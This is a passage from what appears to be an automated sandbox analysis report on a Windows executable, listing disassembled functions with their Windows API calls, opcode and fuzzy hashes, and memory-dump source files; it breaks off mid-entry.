                                                              • Associated: 00000000.00000002.1738615542.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738657685.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738674814.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738690516.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: AllocCriticalCurrentSection$HeapProcessValue$DuplicateEnterHandleInitializeLeaveObjectRegisterSingleThreadWait
                                                              • String ID:
                                                              • API String ID: 298514914-0
                                                              • Opcode ID: 1b9229a9ff34361a6518eb59eadc8af634e0fb6f78aa303e2f888cecdd8f7a24
                                                              • Instruction ID: 65bd0fc00ed65caac6c8ae18375092c396c339aa9c4fc9a556ba9f8eb5a1fbfe
                                                              • Opcode Fuzzy Hash: 1b9229a9ff34361a6518eb59eadc8af634e0fb6f78aa303e2f888cecdd8f7a24
                                                              • Instruction Fuzzy Hash: F141E132205B408AEB129F62EC443E977A0F78CBD5F484129EB490B774DF39C959D740
                                                              Function 0000000140008260 Relevance: 13.7, APIs: 9, Instructions: 249COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1738633150.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000000.00000002.1738615542.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738657685.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738674814.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738690516.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: _wcsdupfreewcsncpy$Value
                                                              • String ID:
                                                              • API String ID: 1554701960-0
                                                              • Opcode ID: 1d879e7a0acd0c0829ed1bc558ef67cfa511ed4a967529a3de4af1c33dacc62b
                                                              • Instruction ID: 9aa5ebfb9d0338231e5de8689cc7ecd01d3be8732c0a46cca62a2a5aa1271af7
                                                              • Opcode Fuzzy Hash: 1d879e7a0acd0c0829ed1bc558ef67cfa511ed4a967529a3de4af1c33dacc62b
                                                              • Instruction Fuzzy Hash: FB91BFB2604A8185EA76DF13B9507EA73A0FB48BD5F484225BFCA476E5EB38C542C701
                                                              Function 000000014000B64C Relevance: 12.1, APIs: 8, Instructions: 56COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1738633150.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000000.00000002.1738615542.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738657685.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738674814.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738690516.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: Window$ClassDestroyEnableProcUnregister
                                                              • String ID:
                                                              • API String ID: 1570244450-0
                                                              • Opcode ID: 91bde67e80f91e2742b9164cbcf556c590c39b782bd753c692008bc4014d2561
                                                              • Instruction ID: 9942cbda7600913111d3f6e009e2264a98590d225334710fbbc2bdadcd09b10d
                                                              • Opcode Fuzzy Hash: 91bde67e80f91e2742b9164cbcf556c590c39b782bd753c692008bc4014d2561
                                                              • Instruction Fuzzy Hash: F121F9B4204A5182FB56DB27F8483A923A1E78CBC1F549126FB4A4B7B5DF3DC8459700
                                                              Function 000000014000BEA0 Relevance: 12.0, APIs: 8, Instructions: 44threadwindowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1738633150.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000000.00000002.1738615542.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738657685.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738674814.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738690516.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: Window$Thread$Current$AllocEnableEnabledForegroundHeapLongProcessVisible
                                                              • String ID:
                                                              • API String ID: 3383493704-0
                                                              • Opcode ID: 58dc5949c501ee915ee066136f95cf395d457a23a7ff8083782f65faeab631ed
                                                              • Instruction ID: 80f857dfb6a9a2f530fca3cb10c8fb692f8ca5f83b5b0ec86a1534c3d91aadad
                                                              • Opcode Fuzzy Hash: 58dc5949c501ee915ee066136f95cf395d457a23a7ff8083782f65faeab631ed
                                                              • Instruction Fuzzy Hash: 9D11397020064182EB46AB27A9483B962A1EB8CBC4F448024FA0A4B6B5DF7DC5458301
                                                              Function 0000000140011AB8 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 53librarysleeploaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1738633150.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000000.00000002.1738615542.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738657685.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738674814.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738690516.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: Library$AddressFreeLoadProcSleep
                                                              • String ID: InitOnceExecuteOnce$Kernel32.dll
                                                              • API String ID: 938261879-1339284965
                                                              • Opcode ID: 9cc1215efa9171b7dae7fadfb2c47d350fa49a6ad5bcb444afd81da3a54d843a
                                                              • Instruction ID: 258e5301f75bcfa7e340e12184f2e3f20ed82b399a9dd39da3854f47a4428b06
                                                              • Opcode Fuzzy Hash: 9cc1215efa9171b7dae7fadfb2c47d350fa49a6ad5bcb444afd81da3a54d843a
                                                              • Instruction Fuzzy Hash: AB118F3120974585EB5ADF57E8843E973A0FB8CBD0F488029AB0A0B666EF3AC595C340
                                                              Function 000000014000BF44 Relevance: 9.1, APIs: 6, Instructions: 63threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1738633150.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000000.00000002.1738615542.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738657685.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738674814.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738690516.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: Window$CurrentThread$EnableEnumWindows
                                                              • String ID:
                                                              • API String ID: 2527101397-0
                                                              • Opcode ID: 819563b769547833593462bfdd9e557783e2fe60f6ea2978649c293be4a90c74
                                                              • Instruction ID: 08829170a8ee5f1b49cfdf050f6537c1ef42b3a6330418e8cb94bb4851fba9f1
                                                              • Opcode Fuzzy Hash: 819563b769547833593462bfdd9e557783e2fe60f6ea2978649c293be4a90c74
                                                              • Instruction Fuzzy Hash: 6D3171B261064182FB62CF22F5487A977A1F75CBE9F484215FB6947AF9CB79C844CB00
                                                              Function 00000001400110DC Relevance: 9.1, APIs: 6, Instructions: 62memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1738633150.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000000.00000002.1738615542.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738657685.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738674814.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738690516.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: AllocValue$Heap
                                                              • String ID:
                                                              • API String ID: 2472784365-0
                                                              • Opcode ID: 817cb6a234a385814b06518aa112c5efe756708d8e68811ae307d73ca14c2163
                                                              • Instruction ID: 773301f083ee798336704ec3d5312664b9b868eef9dc2a5d6ba13fea1fa7b4fd
                                                              • Opcode Fuzzy Hash: 817cb6a234a385814b06518aa112c5efe756708d8e68811ae307d73ca14c2163
                                                              • Instruction Fuzzy Hash: 3821F434200B8096EB4A9B92F8843E963A5F7DCBD0F548429FB4D47B79DE3DC8858740
                                                              Function 0000000140007284 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1738633150.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000000.00000002.1738615542.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738657685.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738674814.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738690516.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: CriticalSection$CloseCreateEnterHandleLeaveObjectSingleThreadWait
                                                              • String ID:
                                                              • API String ID: 458812214-0
                                                              • Opcode ID: 6a38117e792cc01899f22305820c9a0c290a6e73bcc29c544877765eca75b33b
                                                              • Instruction ID: 6ed0f769cbd5916c92599595d34faf5ec2fc13e913d525d246d608b89e2aac48
                                                              • Opcode Fuzzy Hash: 6a38117e792cc01899f22305820c9a0c290a6e73bcc29c544877765eca75b33b
                                                              • Instruction Fuzzy Hash: FD210076204B0081EB06DB22E8943E973A4FB8CBC4F988026EB4D47779DF39C946C340
                                                              Function 0000000140011968 Relevance: 7.6, APIs: 5, Instructions: 51memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1738633150.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000000.00000002.1738615542.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738657685.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738674814.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738690516.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: CriticalSection$FreeHeap$DeleteEnterLeave
                                                              • String ID:
                                                              • API String ID: 3171405041-0
                                                              • Opcode ID: 5bac674c3f8342d6cd0aac8621eb4a2ebf53081d1a9cae62f807694b4d99e6ae
                                                              • Instruction ID: 030e86aa03d9d600b90796447865b7023312810cb66964dcc71f9bcfbca43c2c
                                                              • Opcode Fuzzy Hash: 5bac674c3f8342d6cd0aac8621eb4a2ebf53081d1a9cae62f807694b4d99e6ae
                                                              • Instruction Fuzzy Hash: 4721E735201B4485EB4ADB57E5903E823A4F78CBC4F444115AB5E0B7B6CF3AC4A5C340
                                                              Function 00000001400117FC Relevance: 6.3, APIs: 5, Instructions: 99memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1738633150.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000000.00000002.1738615542.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738657685.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738674814.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738690516.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: CriticalSection$AllocHeap$EnterInitializeLeave
                                                              • String ID:
                                                              • API String ID: 2544007295-0
                                                              • Opcode ID: 964df89806ab1b98e43ea449fff5c56c6dda4054a8aa2c3e42b83df1ec0c2f38
                                                              • Instruction ID: 3c708bd0e8d6be70d523372ffb5b6a2e3cd9d0d7dbc1ea7b56162c86fa93b61b
                                                              • Opcode Fuzzy Hash: 964df89806ab1b98e43ea449fff5c56c6dda4054a8aa2c3e42b83df1ec0c2f38
                                                              • Instruction Fuzzy Hash: 5E413932605B8086EB5ADF56E4403E877A4F79CBD0F54812AEB4D4BBA5DF39C8A5C700
                                                              Function 000000014000E824 Relevance: 6.3, APIs: 5, Instructions: 92COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1738633150.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000000.00000002.1738615542.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738657685.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738674814.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738690516.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: memset$memmove
                                                              • String ID:
                                                              • API String ID: 3527438329-0
                                                              • Opcode ID: 1e0a837dc669331cc5957db2528f79886a441c50ac0b901b14f5572dc67d68da
                                                              • Instruction ID: dba297aa8fb042b18ff0822facc25e4acf5e394d44c3b4579297ae20e1131b5c
                                                              • Opcode Fuzzy Hash: 1e0a837dc669331cc5957db2528f79886a441c50ac0b901b14f5572dc67d68da
                                                              • Instruction Fuzzy Hash: E231007271064081FB16DA2BE4507E96612E38DBD0F848126EB1A83BAACA7EC502C740
                                                              Function 00000001400130CB Relevance: 6.3, APIs: 1, Strings: 3, Instructions: 257COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1738633150.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000000.00000002.1738615542.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738657685.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738674814.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738690516.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $ $header crc mismatch
                                                              • API String ID: 0-4092041874
                                                              • Opcode ID: 55b197aa7f59ea79f5e67b8aaa8e0c71fa88c311ff36f0bd1c48ebfad87586ba
                                                              • Instruction ID: f6894c87bdfd3a48e6411c52319aba3e102a5ca19e93322268f312efd41433f4
                                                              • Opcode Fuzzy Hash: 55b197aa7f59ea79f5e67b8aaa8e0c71fa88c311ff36f0bd1c48ebfad87586ba
                                                              • Instruction Fuzzy Hash: 41A18FB26003508BFB269E1AC48C7AE3BE6F7587C8F064558EB964B3A4D776C954C780
                                                              Function 0000000140007A50 Relevance: 6.2, APIs: 4, Instructions: 163memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1738633150.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000000.00000002.1738615542.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738657685.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738674814.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738690516.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: Heapwcsncpy$AllocFree
                                                              • String ID:
                                                              • API String ID: 1479455602-0
                                                              • Opcode ID: bd39aa7686407ba85d86bffb32f51c5ca4b87867d279337be1c8d10c74bedb84
                                                              • Instruction ID: 28fd82db213d89e843f0df720333d3fbeca218ccf85cb71e10007619eb34b75b
                                                              • Opcode Fuzzy Hash: bd39aa7686407ba85d86bffb32f51c5ca4b87867d279337be1c8d10c74bedb84
                                                              • Instruction Fuzzy Hash: BF51A0B2B0068486EA66DF26A404BEA67E1F789BD4F588125EF4D477E5EB3CC542C300
                                                              Function 00000001400136B0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 106COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1738633150.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000000.00000002.1738615542.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738657685.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738674814.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738690516.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: memmove
                                                              • String ID: $ $invalid stored block lengths
                                                              • API String ID: 2162964266-1718185709
                                                              • Opcode ID: 5a154506d4633e528a7a17bae092f7a518f978704b3b8509104772513ba27d3c
                                                              • Instruction ID: 754f218cd566fbce8dd602483dcb0b6cf2df6dd41c0e80f26ad42ee7a9f80f3a
                                                              • Opcode Fuzzy Hash: 5a154506d4633e528a7a17bae092f7a518f978704b3b8509104772513ba27d3c
                                                              • Instruction Fuzzy Hash: 3A417B766006508BE7268F27D5887AE3BA0F3087C8F155119FF8A4BBA4C776D8A1CB40
                                                              Function 000000014000C4F0 Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1738633150.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000000.00000002.1738615542.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738657685.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738674814.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738690516.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: EntryFunctionLookup$UnwindVirtual
                                                              • String ID:
                                                              • API String ID: 3286588846-0
                                                              • Opcode ID: a43c6ac0d422a0cb868a81bf0a3177776bf41fbc22bf78c230eac44af0668553
                                                              • Instruction ID: 3ebace1c390976f506d0f99ca18ed721a427f0b26ede3763bfd5663c46823d1b
                                                              • Opcode Fuzzy Hash: a43c6ac0d422a0cb868a81bf0a3177776bf41fbc22bf78c230eac44af0668553
                                                              • Instruction Fuzzy Hash: 48512E66A15FC481EA61CB29E5453ED63A0FB9DB84F09A215DF8C13756EF34D2D4C700
                                                              Function 00000001400085F0 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1738633150.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000000.00000002.1738615542.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738657685.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738674814.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738690516.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: CharLower
                                                              • String ID:
                                                              • API String ID: 1615517891-0
                                                              • Opcode ID: c79849e46724dc2abb30ea88d6992f20c8495c80adfb737506759087bbbff476
                                                              • Instruction ID: 89447f37e157e5f910190f26039f07b44efb98263a832e051549732566d91b47
                                                              • Opcode Fuzzy Hash: c79849e46724dc2abb30ea88d6992f20c8495c80adfb737506759087bbbff476
                                                              • Instruction Fuzzy Hash: BB2181766006A092EA66EF13A8047BA76A0F748BF5F5A4211FFD5072E0DB35C495D710
                                                              Function 00000001400171F0 Relevance: 6.1, APIs: 4, Instructions: 56COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1738633150.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000000.00000002.1738615542.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738657685.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738674814.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738690516.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWidemalloc
                                                              • String ID:
                                                              • API String ID: 2735977093-0
                                                              • Opcode ID: 0f974c86f1a7e361068b693f653777688ae97df7ee1888e934fdd283249f1d8a
                                                              • Instruction ID: 84a502ef329111f45b75735ee98b05bbb8abde518fb530cc481733cdeaf2302d
                                                              • Opcode Fuzzy Hash: 0f974c86f1a7e361068b693f653777688ae97df7ee1888e934fdd283249f1d8a
                                                              • Instruction Fuzzy Hash: 76216532608B8086D725CF56B44079AB7A5F7887D4F088325FF9917BA9DF3DC5529700
                                                              Function 000000014000DCA4 Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1738633150.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000000.00000002.1738615542.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738657685.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738674814.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738690516.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: FolderFreeFromListLocationPathTaskwcslen
                                                              • String ID:
                                                              • API String ID: 4012708801-0
                                                              • Opcode ID: 47ccaf1a7f74cd3e733cb6c5cd31dbbbe8972a233b29932fb87548b6fe9d3e17
                                                              • Instruction ID: 658b845125df41e3d707b834e255611bbe4f6e958313e82604e3ea1cd6ed1d71
                                                              • Opcode Fuzzy Hash: 47ccaf1a7f74cd3e733cb6c5cd31dbbbe8972a233b29932fb87548b6fe9d3e17
                                                              • Instruction Fuzzy Hash: 50016972314A5092E7219B26A5807AAA3B4FB88BC0F548026EB4987774DF3AC8528300
                                                              Function 000000014001147C Relevance: 5.1, APIs: 4, Instructions: 122memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1738633150.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000000.00000002.1738615542.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738657685.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738674814.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738690516.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: AllocCriticalHeapSection$EnterLeave
                                                              • String ID:
                                                              • API String ID: 830345296-0
                                                              • Opcode ID: 38d32e320765f0e197812c7802676496a175ef663a849a6793450ef0177ea7f4
                                                              • Instruction ID: a4d5f086a96e389f2db612197d0023b8b07f868559dabceebcf4944cd54701ff
                                                              • Opcode Fuzzy Hash: 38d32e320765f0e197812c7802676496a175ef663a849a6793450ef0177ea7f4
                                                              • Instruction Fuzzy Hash: 47513A72601B44C7EB5ACF26E18039873A5F78CF88F188526EB4E4B766DB35D4A1C750
                                                              Function 000000014000D02C Relevance: 5.1, APIs: 4, Instructions: 75memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1738633150.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000000.00000002.1738615542.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738657685.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738674814.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738690516.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: AllocHeapmemsetwcscpywcslen
                                                              • String ID:
                                                              • API String ID: 1807340688-0
                                                              • Opcode ID: d18a2de789b4fced0d5c5c7af7bdf7f4ac513c7a43bb144637d931b1f82fec87
                                                              • Instruction ID: 2291175711b854bc4f74fb4265d0f1bd771c1a5bff4f4550b8324bf1b1149364
                                                              • Opcode Fuzzy Hash: d18a2de789b4fced0d5c5c7af7bdf7f4ac513c7a43bb144637d931b1f82fec87
                                                              • Instruction Fuzzy Hash: DA3129B1605B4081EB16EF27A5443ECB7A1EB8CFD4F588126AF4D0B7AADF39C4518351
                                                              Function 000000014000CCD8 Relevance: 5.1, APIs: 4, Instructions: 75memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1738633150.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000000.00000002.1738615542.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738657685.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738674814.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738690516.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: Heap$Free$Alloc
